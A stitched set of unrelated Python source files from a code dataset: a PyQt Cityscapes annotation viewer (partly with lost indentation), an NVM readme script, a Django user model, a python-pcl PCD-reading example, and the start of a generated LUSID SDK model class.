
    If no label file is found the current annotation is cleared. The
    filename is remembered either way so repeated calls are cheap.
    """
    filename = self.getLabelFilename()
    if not filename:
        self.clearAnnotation()
        return

    # If we have everything and the filename did not change, then we are good
    if self.annotation and filename == self.currentLabelFile:
        return

    # Clear the current labels first
    self.clearAnnotation()

    try:
        self.annotation = Annotation(self.gtType)
        self.annotation.fromJsonFile(filename)
    except IOError as e:
        # This is the error if the file does not exist
        message = "Error parsing labels in {0}. Message: {1}".format( filename, e.strerror )
        self.statusBar().showMessage(message)

    # Remember the filename loaded
    self.currentLabelFile = filename

    # Remember the status bar message to restore it later
    # NOTE(review): reading the current message and immediately re-showing
    # it is a no-op here -- presumably a leftover from the label tool.
    restoreMessage = self.statusBar().currentMessage()

    # Restore the message
    self.statusBar().showMessage( restoreMessage )
# Load the disparity map from file
# Only loads if they exist
def loadDisparities(self):
    """Load and colorize the disparity map of the current image, if enabled.

    Converts the 16-bit Cityscapes disparity PNG (values scaled by 128)
    into an indexed QImage colored via self.colormap and stores it in
    self.dispOverlay. Skips work when disabled or already loaded.
    """
    if not self.enableDisparity:
        return
    if not self.showDisparity:
        return

    filename = self.getDisparityFilename()
    if not filename:
        self.dispImg = None
        return

    # If we have everything and the filename did not change, then we are good
    if self.dispImg and filename == self.currentDispFile:
        return

    # Clear the current disparity image first
    self.dispImg = None

    try:
        self.dispImg = Image.open(filename)
    except IOError as e:
        # This is the error if the file does not exist
        message = "Error parsing disparities in {0}. Message: {1}".format( filename, e.strerror )
        self.statusBar().showMessage(message)
        self.dispImg = None

    if self.dispImg:
        # Undo the x128 storage scaling, then round to the nearest integer.
        dispNp = np.array( self.dispImg )
        dispNp = dispNp / 128.
        # FIX: ndarray.round() returns a NEW array; the original discarded
        # the result, so values were truncated by the uint8 cast instead of
        # rounded. Assign the rounded array back before casting.
        dispNp = dispNp.round()
        dispNp = np.array( dispNp , dtype=np.uint8 )
        dispQt = QtGui.QImage( dispNp.data , dispNp.shape[1] , dispNp.shape[0] , QtGui.QImage.Format_Indexed8 )
        # Build the 256-entry indexed color table from the matplotlib colormap.
        colortable = []
        for i in range(256):
            color = self.colormap.to_rgba(i)
            colorRgb = ( int(color[0]*255) , int(color[1]*255) , int(color[2]*255) )
            colortable.append( QtGui.qRgb( *colorRgb ) )
        dispQt.setColorTable( colortable )
        dispQt = dispQt.convertToFormat( QtGui.QImage.Format_ARGB32_Premultiplied )
        self.dispOverlay = dispQt

    # Remember the filename loaded
    self.currentDispFile = filename

    # Remember the status bar message to restore it later
    restoreMessage = self.statusBar().currentMessage()

    # Restore the message
    self.statusBar().showMessage( restoreMessage )
#############################
## Drawing
#############################
    # This method is called when redrawing everything
    # Can be manually triggered by self.update()
    # Note that there must not be any other self.update within this method
    # or any methods that are called within
    def paintEvent(self, event):
        """Redraw the whole widget: image, overlay, mouse label and zoom."""
        # Create a QPainter that can perform draw actions within a widget or image
        qp = QtGui.QPainter()
        # Begin drawing in the application widget
        qp.begin(self)
        # Update scale
        self.updateScale(qp)
        # Determine the object ID to highlight
        self.getHighlightedObject(qp)
        # Draw the image first
        self.drawImage(qp)

        if self.enableDisparity and self.showDisparity:
            # Draw the disparities on top
            overlay = self.drawDisp(qp)
        else:
            # Draw the labels on top
            # NOTE(review): if gtType is neither POLY nor BBOX, `overlay`
            # stays unbound and drawZoom below raises -- presumably gtType
            # is always one of the two; confirm.
            if self.gtType == CsObjectType.POLY:
                overlay = self.drawLabels(qp)
            elif self.gtType == CsObjectType.BBOX:
                overlay = self.drawBboxes(qp)

        # Draw the label name next to the mouse
        self.drawLabelAtMouse(qp)

        # Draw the zoom
        self.drawZoom(qp, overlay)

        # Thats all drawing
        qp.end()

        # Forward the paint event
        QtWidgets.QMainWindow.paintEvent(self,event)
# Update the scaling
def updateScale(self, qp):
if not self.image.width() or not self.image.height():
return
# Horizontal offset
self.xoff = self.bordergap
# Vertical offset
self.yoff = self.toolbar.height()+self.bordergap
# We want to make sure to keep the image aspect ratio and to make it fit within the widget
# Without keeping the aspect ratio, each side of the image is scaled (multiplied) with
sx = float(qp.device().width() - 2*self.xoff) / self.image.width()
sy = float(qp.device().height() - 2*self.yoff) / self.image.height()
# To keep the aspect ratio while making sure it fits, we use the minimum of both scales
# Remember the scale for later
self.scale = min( sx , sy )
# These are then the actual dimensions used
self.w = self.scale * self.image.width()
self.h = self.scale * self.image.height()
# Determine the highlighted object for drawing
def getHighlightedObject(self, qp):
# This variable we want to fill
self.highlightObj = None
# Without labels we cannot do so
if not self.annotation:
return
# If available its the selected object
highlightObjId = -1
# If not available but the polygon is empty or closed, its the mouse object
if highlightObjId < 0 and not self.mouseOutsideImage:
highlightObjId = self.mouseObj
# Get the actual object that is highlighted
if highlightObjId >= 0:
self.highlightObj = self.annotation.objects[highlightObjId]
self.highlightObjLabel = self.annotation.objects[highlightObjId].label
# Draw the image in the given QPainter qp
def drawImage(self, qp):
# Return if no image available
if self.image.isNull():
return
# Save the painters current setting to a stack
qp.save()
# Draw the image
qp.drawImage(QtCore.QRect( self.xoff, self.yoff, self.w, self.h ), self.image)
# Restore the saved setting from the stack
qp.restore()
def getPolygon(self, obj):
poly = QtGui.QPolygonF()
for pt in obj.polygon:
point = QtCore.QPointF(pt.x,pt.y)
poly.append( point )
return poly
# Draw the labels in the given QPainter qp
# optionally provide a list of labels to ignore
def drawLabels(self, qp, ignore = []):
if self.image.isNull() or self.w == 0 or self.h == 0:
return
if not self.annotation:
return
# The overlay is created in the viewing coordinates
# This way, the drawing is more dense and the polygon edges are nicer
# We create an image that is the overlay
# Within this image we draw using another QPainter
# Finally we use the real QPainter to overlay the overlay-image on what is drawn so far
# The image that is used to draw the overlays
overlay = QtGui.QImage( self.w, self.h, QtGui.QImage.Format_ARGB32_Premultiplied )
# Fill the image with the default color
defaultLabel = name2label[self.defaultLabel]
col = QtGui.QColor( *defaultLabel.color )
overlay.fill( col )
# Create a new QPainter that draws in the overlay image
qp2 = QtGui.QPainter()
qp2.begin(overlay)
# The color of the outlines
qp2.setPen(QtGui.QColor('white'))
# Draw all objects
for obj in self.annotation.objects:
# The label of the object
name = assureSingleInstanceName( obj.label )
# If we do not know a color for this label, warn the user
if name not in name2label:
print("The annotations contain unkown labels. This should not happen. Please inform the datasets authors. Thank you!")
print("Details: label '{}', file '{}'".format(name,self.currentLabelFile))
continue
poly = self.getPolygon(obj)
# Scale the polygon properly
polyToDraw = poly * QtGui.QTransform.fromScale(self.scale,self.scale)
# Default drawing
# Color from color table, solid brush
col = QtGui.QColor( *name2label[name].color )
brush = QtGui.QBrush( col, QtCore.Qt.SolidPattern )
qp2.setBrush(brush)
# Overwrite drawing if this is the highlighted object
if self.highlightObj and obj == self.highlightObj:
# First clear everything below of the polygon
qp2.setCompositionMode( QtGui.QPainter.CompositionMode_Clear )
qp2.drawPolygon( polyToDraw )
qp2.setCompositionMode( QtGui.QPainter.CompositionMode_SourceOver )
# Set the drawing to a special pattern
brush = QtGui.QBrush(col,QtCore.Qt.DiagCrossPattern)
qp2.setBrush(brush)
qp2.drawPolygon( polyToDraw )
# Draw outline of selected object dotted
if self.highlightObj:
brush = QtGui.QBrush(QtCore.Qt.NoBrush)
qp2.setBrush(brush)
qp2.setPen(QtCore.Qt.DashLine)
polyToDraw = self.getPolygon(self.highlightObj) * QtGui.QTransform.fromScale(self.scale,self.scale)
qp2.drawPolygon( polyToDraw )
# End the drawing of the overlay
qp2.end()
# Save QPainter settings to stack
qp.save()
# Define transparency
qp.setOpacity(self.transp)
# Draw the overlay image
qp.drawImage(self.xoff,self.yoff,overlay)
# Restore settings
qp.restore()
return overlay
def getBoundingBox(self, obj):
bbox = QtCore.QRectF(obj.bbox[0], obj.bbox[1], obj.bbox[2], obj.bbox[3])
bboxVis = QtCore.QRectF(obj.bboxVis[0], obj.bboxVis[1], obj.bboxVis[2], obj.bboxVis[3])
return bbox, bboxVis
def scaleBoundingBox(self, bbox):
bboxToDraw = copy.deepcopy(bbox)
x,y,w,h = bboxToDraw.getRect()
bboxToDraw.setTopLeft(QtCore.QPointF(x*self.scale, y*self.scale))
bboxToDraw.setSize(QtCore.QSizeF(w*self.scale, h*self.scale))
return bboxToDraw
# Draw the labels in the given QPainter qp
# optionally provide a list of labels to ignore
def drawBboxes(self, qp, ignore = []):
if self.image.isNull() or self.w == 0 or self.h == 0:
return
if not self.annotation:
return
# The overlay is created in the viewing coordinates
# This way, the drawing is more dense and the polygon edges are nicer
# We create an image that is the overlay
# Within this image we draw using another QPainter
# Finally we use the real QPainter to overlay the overlay-image on what is drawn so far
# The image that is used to draw the overlays
overlay = QtGui.QImage( self.w, self.h, QtGui.QImage.Format_ARGB32_Premultiplied )
# Fill the image
col = QtGui.QColor(0, 0, 0, 0)
overlay.fill( col )
# Create a new QPainter that draws in the overlay image
qp2 = QtGui.QPainter()
qp2.begin(overlay)
# Draw all objects
for obj in self.annotation.objects:
bbox, bboxVis = self.getBoundingBox(obj)
bboxToDraw = self.scaleBoundingBox(bbox)
bboxVisToDraw = self.scaleBoundingBox(bbox)
# The label of the object
name = obj.label
# If we do not know a color for this label, warn the user
if name not in name2labelCp:
print("The annotations contain unknown labels. This should not happen. Please inform the datasets authors. Thank you!")
print("Details: label '{}', file '{}'".format(name,self.currentLabelFile))
continue
# Reset brush for QPainter object
qp2.setBrush(QtGui.QBrush())
# Color from color table
col = QtGui.QColor( *name2labelCp[name].color )
if name2labelCp[name].hasInstances:
if self.highlightObj and obj == self.highlightObj:
pen = QtGui.QPen(QtGui.QBrush( col ), 5.0)
else:
pen = QtGui.QPen(QtGui.QBrush( col ), 3.0)
qp2.setPen(pen)
qp2.setOpacity(1.0)
qp2.drawRect( bboxToDraw )
if self.highlightObj and obj == self.highlightObj:
pen = QtGui.QPen(QtGui.QBrush( col ), 3.0, style=QtCore.Qt.DotLine)
qp2.setPen(pen)
qp2.setOpacity(1.0)
qp2.drawRect( bboxVisToDraw )
else:
pen = QtGui.QPen(QtGui.QBrush( col ), 1.0, style=QtCore.Qt.DashLine)
qp2.setPen(pen)
qp2.setOpacity(1.0)
qp2.drawRect( bboxVisToDraw )
qp2.setBrush(QtGui.QBrush( col, QtCore.Qt.SolidPattern ))
qp2.setOpacity(0.4)
qp2.drawRect( bboxVisToDraw )
else:
if self.highlightObj and obj == self.highlightObj:
pen = QtGui.QPen(QtGui.QBrush( col ), 3.0)
qp2.setPen(pen)
qp2.setBrush(QtGui.QBrush( col, QtCore.Qt.NoBrush ))
else:
pen = QtGui.QPen(QtGui.QBrush( col ), 1.0)
qp2.setPen(pen)
qp2.setBrush(QtGui.QBrush( col, QtCore.Qt.DiagCrossPattern ))
qp2.setOpacity(1.0)
qp2.drawRect( bboxToDraw )
# End the drawing of the overlay
qp2.end()
# Save QPainter settings to stack
qp.save()
# Define transparency
qp.setOpacity(self.transp)
# Draw the overlay image
qp.drawImage(self.xoff,self.yoff,overlay)
# Restore settings
qp.restore()
return overlay
    # Draw the label name next to the mouse
    def drawLabelAtMouse(self, qp):
        """Write the highlighted object's label next to the mouse cursor."""
        # Nothing to do without a highlighted object
        if not self.highlightObj:
            return
        # Nothing to do without a mouse position
        if not self.mousePosOrig:
            return

        # Save QPainter settings to stack
        qp.save()

        # That is the mouse position
        mouse = self.mousePosOrig
        # Will show zoom
        showZoom = self.zoom and not self.image.isNull() and self.w and self.h
        # The text that is written next to the mouse
        mouseText = self.highlightObj.label

        # Where to write the text
        # Depends on the zoom (additional offset to mouse to make space for zoom?)
        # The location in the image (if we are at the top we want to write below of the mouse)
        off = 36
        if showZoom:
            off += self.zoomSize/2
        if mouse.y()-off > self.toolbar.height():
            # Enough room above the mouse: draw the text there
            top = mouse.y()-off
            btm = mouse.y()
            vAlign = QtCore.Qt.AlignTop
        else:
            # Too close to the top: draw below the mouse instead
            # The height of the cursor
            if not showZoom:
                off += 20
            top = mouse.y()
            btm = mouse.y()+off
            vAlign = QtCore.Qt.AlignBottom

        # Here we can draw (a 400px-wide rectangle centered on the mouse)
        rect = QtCore.QRect()
        rect.setTopLeft(QtCore.QPoint(mouse.x()-200,top))
        rect.setBottomRight(QtCore.QPoint(mouse.x()+200,btm))

        # The color
        qp.setPen(QtGui.QColor('white'))
        # The font to use
        font = QtGui.QFont("Helvetica",20,QtGui.QFont.Bold)
        qp.setFont(font)
        # Non-transparent
        qp.setOpacity(1)
        # Draw the text, horizontally centered
        qp.drawText(rect,QtCore.Qt.AlignHCenter|vAlign,mouseText)
        # Restore settings
        qp.restore()
    # Draw the zoom
    def drawZoom(self,qp,overlay):
        """Draw a magnified view of the image (plus overlay) around the mouse."""
        # Zoom disabled?
        if not self.zoom:
            return
        # No image
        if self.image.isNull() or not self.w or not self.h:
            return
        # No mouse
        if not self.mousePosOrig:
            return

        # Abbrevation for the zoom window size
        zoomSize = self.zoomSize
        # Abbrevation for the mouse position
        mouse = self.mousePosOrig

        # The pixel that is the zoom center
        pix = self.mousePosScaled
        # The size of the part of the image that is drawn in the zoom window
        selSize = zoomSize / ( self.zoomFactor * self.zoomFactor )
        # The selection window for the image
        sel = QtCore.QRectF(pix.x() -selSize/2 ,pix.y() -selSize/2 ,selSize,selSize )
        # The selection window for the widget
        view = QtCore.QRectF(mouse.x()-zoomSize/2,mouse.y()-zoomSize/2,zoomSize,zoomSize)

        # Scale the overlay to image resolution so the same selection
        # rectangle fits both; otherwise create a placeholder image.
        # NOTE(review): the fallback QImage is never fill()ed, so its
        # contents are undefined -- it should probably be filled fully
        # transparent; confirm.
        if overlay :
            overlay_scaled = overlay.scaled(self.image.width(), self.image.height())
        else :
            overlay_scaled = QtGui.QImage( self.image.width(), self.image.height(), QtGui.QImage.Format_ARGB32_Premultiplied )

        # Show the zoom image
        qp.save()
        qp.drawImage(view,self.image,sel)
        qp.setOpacity(self.transp)
        qp.drawImage(view,overlay_scaled,sel)
        qp.restore()
# Draw disparities
def drawDisp( self , qp ):
if not self.dispOverlay:
return
# Save QPainter settings to stack
qp.save()
# Define transparency
qp.setOpacity(self.transp)
# Draw the overlay image
qp.drawImage(QtCore.QRect( self.xoff, self.yoff, self.w, self.h ),self.dispOverlay)
# Restore settings
qp.restore()
return self.dispOverlay
#############################
## Mouse/keyboard events
#############################
    # Mouse moved
    # Need to save the mouse position
    # Need to drag a polygon point
    # Need to update the mouse selected object
    def mouseMoveEvent(self,event):
        """Track the mouse, clamp it to the image, and refresh the hovered object."""
        if self.image.isNull() or self.w == 0 or self.h == 0:
            return

        # Widget coordinates and the corresponding image-pixel coordinates
        mousePosOrig = QtCore.QPointF( event.x() , event.y() )
        mousePosScaled = QtCore.QPointF( float(mousePosOrig.x() - self.xoff) / self.scale , float(mousePosOrig.y() - self.yoff) / self.scale )
        mouseOutsideImage = not self.image.rect().contains( mousePosScaled.toPoint() )

        # Clamp the scaled position into the image rectangle
        mousePosScaled.setX( max( mousePosScaled.x() , 0. ) )
        mousePosScaled.setY( max( mousePosScaled.y() , 0. ) )
        mousePosScaled.setX( min( mousePosScaled.x() , self.image.rect().right() ) )
        mousePosScaled.setY( min( mousePosScaled.y() , self.image.rect().bottom() ) )

        # Should not happen after clamping; reset state defensively if it does
        if not self.image.rect().contains( mousePosScaled.toPoint() ):
            print(self.image.rect())
            print(mousePosScaled.toPoint())
            self.mousePosScaled = None
            self.mousePosOrig = None
            self.updateMouseObject()
            self.update()
            return

        self.mousePosScaled = mousePosScaled
        self.mousePosOrig = mousePosOrig
        self.mouseOutsideImage = mouseOutsideImage

        # Redraw
        self.updateMouseObject()
        self.update()
# Mouse left the widget
def leaveEvent(self, event):
self.mousePosOrig = None
self.mousePosScaled = None
self.mouseOutsideImage = True
# Mouse wheel scrolled
def wheelEvent(self, event):
ctrlPressed = event.modifiers() & QtCore.Qt.ControlModifier
deltaDegree = event.angleDelta().y() / 8 # Rotation in degree
deltaSteps = deltaDegree / 15 # Usually one step on the mouse is 15 degrees
if ctrlPressed:
self.transp = max(min(self.transp+(deltaSteps*0.1),1.0),0.0)
self.update()
else:
if self.zoom:
# If shift is pressed, change zoom window size
if event.modifiers() and QtCore.Qt.Key_Shift:
self.zoomSize += deltaSteps * 10
self.zoomSize = max( self.zoomSize, 10 )
self.zoomSize = min( self.zoomSize, 1000 )
# Change zoom factor
else:
self.zoomFactor += deltaSteps * 0.05
self.zoomFactor = max( self.zoomFactor, 0.1 )
self.zoomFactor = min( self.zoomFactor, 10 )
self.update()
#############################
## Little helper methods
#############################
# Helper method that sets tooltip and statustip
# Provide an QAction and the tip text
# This text is appended with a hotkeys and then assigned
def setTip( self, action, tip ):
tip += " (Hotkeys: '" + "', '".join([str(s.toString()) for s in action.shortcuts()]) + "')"
action.setStatusTip(tip)
action.setToolTip(tip)
# Update the object that is selected by the current mouse curser
def updateMouseObject(self):
self.mouseObj = -1
if self.mousePosScaled is None:
return
for idx in reversed(range(len(self.annotation.objects))):
obj = self.annotation.objects[idx]
if obj.objectType == CsObjectType.POLY:
if self.getPolygon(obj).containsPoint(self.mousePosScaled, QtCore.Qt.OddEvenFill):
self.mouseObj = idx
break
elif obj.objectType == CsObjectType.BBOX:
bbox, _ = self.getBoundingBox(obj)
if bbox.contains(self.mousePosScaled):
self.mouseObj = idx
break
# Clear the current labels
def clearAnnotation(self):
self.annotation = None
self.currentLabelFile = ""
    def getCityFromUser(self):
        """Ask the user for a (split, gt type, city) and load that city.

        Scans the dataset root (CITYSCAPES_DATASET env var, or two levels
        above this file) for available annotation/split/city combinations,
        shows a selection dialog, and configures the image/label/disparity
        paths accordingly. Exits the application if no data is found.
        """
        # Reset the status bar to this message when leaving
        restoreMessage = self.statusBar().currentMessage()

        # Locate the dataset root
        if 'CITYSCAPES_DATASET' in os.environ:
            csPath = os.environ['CITYSCAPES_DATASET']
        else:
            csPath = os.path.join(os.path.dirname(os.path.realpath(__file__)),'..','..')

        # Collect all non-empty city folders per annotation type and split
        availableCities = []
        annotations = [ "gtFine" , "gtCoarse" , "gtBboxCityPersons" ]
        splits = [ "train_extra" , "train" , "val" , "test" ]
        for gt in annotations:
            for split in splits:
                cities = glob.glob(os.path.join(csPath, gt, split, '*'))
                cities.sort()
                availableCities.extend( [ (split,gt,os.path.basename(c)) for c in cities if os.listdir(c) ] )

        # List of possible labels
        items = [split + ", " + gt + ", " + city for (split,gt,city) in availableCities]

        # Specify title
        dlgTitle = "Select new city"
        message = dlgTitle
        question = dlgTitle
        message = "Select city for viewing"
        question = "Which city would you like to view?"
        self.statusBar().showMessage(message)

        if items:
            # Create and wait for dialog
            (item, ok) = QtWidgets.QInputDialog.getItem(self, dlgTitle, question,
                                                        items, 0, False)

            # Restore message
            self.statusBar().showMessage(restoreMessage)

            if ok and item:
                (split, gt, city) = [str(i) for i in item.split(', ')]
                # Test images have no fine labels; show the image more clearly
                if split == 'test' and not self.showDisparity:
                    self.transp = 0.1
                else:
                    self.transp = 0.5
                # Derive the image, label and disparity folders for the city
                self.city = os.path.normpath(os.path.join(csPath, "leftImg8bit", split, city))
                self.labelPath = os.path.normpath(os.path.join(csPath, gt , split, city))
                self.dispPath = os.path.normpath(os.path.join(csPath, "disparity" , split, city))
                # Ground-truth type decides whether polygons or boxes are drawn
                if gt in [ "gtFine", "gtCoarse" ]:
                    self.gtType = CsObjectType.POLY
                elif gt in [ "gtBboxCityPersons" ]:
                    self.gtType = CsObjectType.BBOX
                self.loadCity()
                self.imageChanged()

        else:
            # No data at all: explain how to point the tool at the dataset, then exit
            warning = ""
            warning += "The data was not found. Please:\n\n"
            warning += " - make sure the scripts folder is in the Cityscapes root folder\n"
            warning += "or\n"
            warning += " - set CITYSCAPES_DATASET to the Cityscapes root folder\n"
            warning += "       e.g. 'export CITYSCAPES_DATASET=<root_path>'\n"

            reply = QtWidgets.QMessageBox.information(self, "ERROR!", warning,
                                                      QtWidgets.QMessageBox.Ok)
            if reply == QtWidgets.QMessageBox.Ok:
                sys.exit()

        return
# Determine if the given candidate for a label path makes sense
def isLabelPathValid(self, labelPath):
return os.path.isdir(labelPath)
# Get the filename where to load labels
# Returns empty string if not possible
def getLabelFilename(self):
# And we need to have a directory where labels should be searched
if not self.labelPath:
return ""
# Without the name of the current images, there is also nothing we can do
if not self.currentFile:
return ""
# Check if the label directory is valid.
if not self.isLabelPathValid(self.labelPath):
return ""
# Generate the filename of the label file
filename = os.path.basename(self.currentFile)
filename = filename.replace(self.imageExt, self.gtExt)
filename = os.path.join(self.labelPath, filename)
search = glob.glob(filename)
if not search:
return ""
filename = os.path.normpath(search[0])
return filename
# Get the filename where to load disparities
# Returns empty string if not possible
def getDisparityFilename( self ):
# And we need to have a directory where disparities should be searched
if not self.dispPath:
return ""
# Without the name of the current images, there is also nothing we can do
if not self.currentFile:
return ""
# Check if the label directory is valid.
if not os.path.isdir(self.dispPath):
return ""
# Generate the filename of the label file
filename = os.path.basename( self.currentFile )
filename = filename.replace( self.imageExt , self.dispExt )
filename = os.path.join( self.dispPath , filename )
filename = os.path.normpath(filename)
return filename
    # Disable the popup menu on right click
    # (overriding QMainWindow.createPopupMenu with a no-op suppresses the
    # default toolbar context menu)
    def createPopupMenu(self):
        pass
def main():
    """Start the Qt application, show the viewer, and run until quit."""
    application = QtWidgets.QApplication(sys.argv)
    viewer = CityscapesViewer()  # keep a reference so the window is not collected
    sys.exit(application.exec_())
# Run the viewer when executed as a script
if __name__ == '__main__':
    main()
| 37.422697 | 142 | 0.58856 |
c9de4ffb21a986b82dbb8f892a05e59ed3884b9c | 1,433 | py | Python | readme.py | khushbooG9/nvm | c065af6ae1cb330cf0716d35bc4aebd46547888e | [
"MIT"
] | 3 | 2020-11-18T11:04:03.000Z | 2021-03-31T06:58:49.000Z | readme.py | khushbooG9/nvm | c065af6ae1cb330cf0716d35bc4aebd46547888e | [
"MIT"
] | null | null | null | readme.py | khushbooG9/nvm | c065af6ae1cb330cf0716d35bc4aebd46547888e | [
"MIT"
] | 4 | 2019-07-23T04:42:55.000Z | 2022-02-07T02:57:59.000Z | register_names = ["r0", "r1"]
programs = {
"myfirstprogram":"""
### computes logical-and of r0 and r1, overwriting r0 with result
nop # do nothing
sub and # call logical-and sub-routine
exit # halt execution
and: cmp r0 false # compare first conjunct to false
jie and.f # jump, if equal to false, to and.f label
cmp r1 false # compare second conjunct to false
jie and.f # jump, if equal false, to and.f label
mov r0 true # both conjuncts true, set r0 to true
ret # return from sub-routine
and.f: mov r0 false # a conjunct was false, set r0 to false
ret # return from sub-routine
"""}
from nvm.nvm import make_scaled_nvm
my_nvm = make_scaled_nvm(
register_names = register_names,
programs = programs,
orthogonal=True)
my_nvm.assemble(programs)
my_nvm.load("myfirstprogram",
initial_state = {"r0":"true","r1":"false"})
print(my_nvm.net.layers["r0"].shape)
print(my_nvm.net.activity["r0"].T)
v = my_nvm.net.activity["r0"].T
print(my_nvm.net.layers["r0"].coder.decode(v))
print(my_nvm.decode_state(layer_names=register_names))
import itertools
for t in itertools.count():
my_nvm.net.tick()
if my_nvm.at_exit(): break
print(my_nvm.net.layers["opc"].coder.decode(my_nvm.net.activity["opc"]) == "exit")
print(t)
print(my_nvm.decode_state(layer_names=register_names))
| 27.557692 | 82 | 0.655967 |
123216561ac776907a92673ff607efe113055d0e | 54 | py | Python | melomaniac/soundcloud/__init__.py | sdispater/melomaniac | 26edeba844d4822bb1df287d996356786d6d7a38 | [
"MIT"
] | 18 | 2016-09-30T21:48:57.000Z | 2022-01-10T12:58:01.000Z | melomaniac/gmusic/__init__.py | sdispater/melomaniac | 26edeba844d4822bb1df287d996356786d6d7a38 | [
"MIT"
] | 3 | 2018-01-17T19:59:08.000Z | 2020-10-09T01:00:39.000Z | melomaniac/gmusic/__init__.py | sdispater/melomaniac | 26edeba844d4822bb1df287d996356786d6d7a38 | [
"MIT"
] | 4 | 2017-12-27T02:19:01.000Z | 2019-07-20T18:07:59.000Z | # -*- coding: utf-8 -*-
from .backend import Backend
| 13.5 | 28 | 0.62963 |
7d5e56a5186b48e5ace3644e73993ff01665b1f8 | 1,001 | py | Python | app_user/models.py | ybedirhanpak/infinite-workout-server | ba23f6f568129c68b0e5166ce2960bde1c5d75f2 | [
"MIT"
] | null | null | null | app_user/models.py | ybedirhanpak/infinite-workout-server | ba23f6f568129c68b0e5166ce2960bde1c5d75f2 | [
"MIT"
] | 1 | 2020-08-17T20:23:34.000Z | 2020-08-17T20:23:34.000Z | app_user/models.py | ybedirhanpak/infinite-workout-server | ba23f6f568129c68b0e5166ce2960bde1c5d75f2 | [
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.base_user import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
from app_common.models import BaseModel
from .managers import UserManager
class User(PermissionsMixin, AbstractBaseUser, BaseModel):
    """Custom user model that authenticates by email address."""

    username = models.CharField(max_length=255, unique=True)
    email = models.EmailField(unique=True)
    # Optional profile information
    full_name = models.CharField(max_length=255, null=True, blank=True)
    age = models.PositiveIntegerField(null=True, blank=True)
    weight = models.PositiveIntegerField(null=True, blank=True)
    bio = models.TextField(null=True, blank=True)
    # Whether the profile is visible to other users
    is_visible = models.BooleanField(default=True)
    # Standard Django account/permission flags
    is_active = models.BooleanField(default=True)
    is_staff = models.BooleanField(default=False)
    is_superuser = models.BooleanField(default=False)

    # Log in with the email address instead of the username
    USERNAME_FIELD = 'email'
    EMAIL_FIELD = 'email'

    objects = UserManager()

    def __str__(self):
        # e.g. "jdoe-jdoe@example.com"
        return '{}-{}'.format(self.username, self.email)
| 37.074074 | 71 | 0.756244 |
a026c05a6d9b62216e89db9aca5ec4a0a0f04efc | 1,298 | py | Python | examples/official/IO/pcd_read.py | conica-cui/python-pcl | b54e80e7da94ac9e2279b95fdac597f1de7145d7 | [
"BSD-3-Clause"
] | 1,705 | 2015-01-08T08:25:12.000Z | 2022-03-31T07:02:55.000Z | examples/official/IO/pcd_read.py | Sh4zKh4n/python-pcl | 1d83d2d7ce9ce2c22ff5855249459bfc22025000 | [
"BSD-3-Clause"
] | 331 | 2015-01-03T12:31:01.000Z | 2022-03-31T21:00:32.000Z | examples/official/IO/pcd_read.py | Sh4zKh4n/python-pcl | 1d83d2d7ce9ce2c22ff5855249459bfc22025000 | [
"BSD-3-Clause"
] | 666 | 2015-01-15T03:42:49.000Z | 2022-03-25T13:48:33.000Z | # -*- coding: utf-8 -*-
#
# #include <iostream>
# #include <pcl/io/pcd_io.h>
# #include <pcl/point_types.h>
#
# int main (int argc, char** argv)
# {
# pcl::PointCloud<pcl::PointXYZ>::Ptr cloud (new pcl::PointCloud<pcl::PointXYZ>);
#
# if (pcl::io::loadPCDFile<pcl::PointXYZ> ("test_pcd.pcd", *cloud) == -1) //* load the file
# {
# PCL_ERROR ("Couldn't read file test_pcd.pcd \n");
# return (-1);
# }
# std::cout << "Loaded "
# << cloud->width * cloud->height
# << " data points from test_pcd.pcd with the following fields: "
# << std::endl;
# for (size_t i = 0; i < cloud->points.size (); ++i)
# std::cout << " " << cloud->points[i].x
# << " " << cloud->points[i].y
# << " " << cloud->points[i].z << std::endl;
#
# return (0);
# }
import pcl
def main():
    """Load a PCD file with python-pcl and print every point it contains."""
    cloud = pcl.load('./examples/official/IO/test_pcd.pcd')
    count = cloud.width * cloud.height
    print('Loaded ' + str(count) +
          ' data points from test_pcd.pcd with the following fields: ')
    for idx in range(cloud.size):
        point = cloud[idx]
        print('x: ' + str(point[0]) + ', y : ' +
              str(point[1]) + ', z : ' + str(point[2]))
if __name__ == "__main__":
    # Profiling hooks, left commented out for quick benchmarking:
    # import cProfile
    # cProfile.run('main()', sort='time')
    main()
| 28.844444 | 93 | 0.523883 |
68f4d0f73cdbde3d11574fb6e01b7e55988c27d7 | 105 | py | Python | tests/integration/__init__.py | langrenn-sprint/photo-service | 9383ec0a12f49247cb0ac2255012d0e87e896e4e | [
"Apache-2.0"
] | null | null | null | tests/integration/__init__.py | langrenn-sprint/photo-service | 9383ec0a12f49247cb0ac2255012d0e87e896e4e | [
"Apache-2.0"
] | null | null | null | tests/integration/__init__.py | langrenn-sprint/photo-service | 9383ec0a12f49247cb0ac2255012d0e87e896e4e | [
"Apache-2.0"
] | null | null | null | """Integration test package.
Modules:
test_factory
test_ping
test_ready
test_photos
"""
| 11.666667 | 28 | 0.67619 |
b26dd5fa2444ac01582801ccaef8e46766ef4fa2 | 5,815 | py | Python | sdk/lusid_asyncio/models/atom_value_string.py | finbourne/lusid-sdk-python-asyncio-preview | 290f93590ab5485661216c8622d3de9f7af0ed60 | [
"MIT"
] | null | null | null | sdk/lusid_asyncio/models/atom_value_string.py | finbourne/lusid-sdk-python-asyncio-preview | 290f93590ab5485661216c8622d3de9f7af0ed60 | [
"MIT"
] | null | null | null | sdk/lusid_asyncio/models/atom_value_string.py | finbourne/lusid-sdk-python-asyncio-preview | 290f93590ab5485661216c8622d3de9f7af0ed60 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.11.3923
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from lusid_asyncio.configuration import Configuration
class AtomValueString(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
      required_map (dict): The key is attribute name
                           and the value is whether it is 'required' or 'optional'.
    """
    openapi_types = {
        'value': 'str',
        'atom_value_type': 'str'
    }

    attribute_map = {
        'value': 'value',
        'atom_value_type': 'atomValueType'
    }

    required_map = {
        'value': 'optional',
        'atom_value_type': 'required'
    }

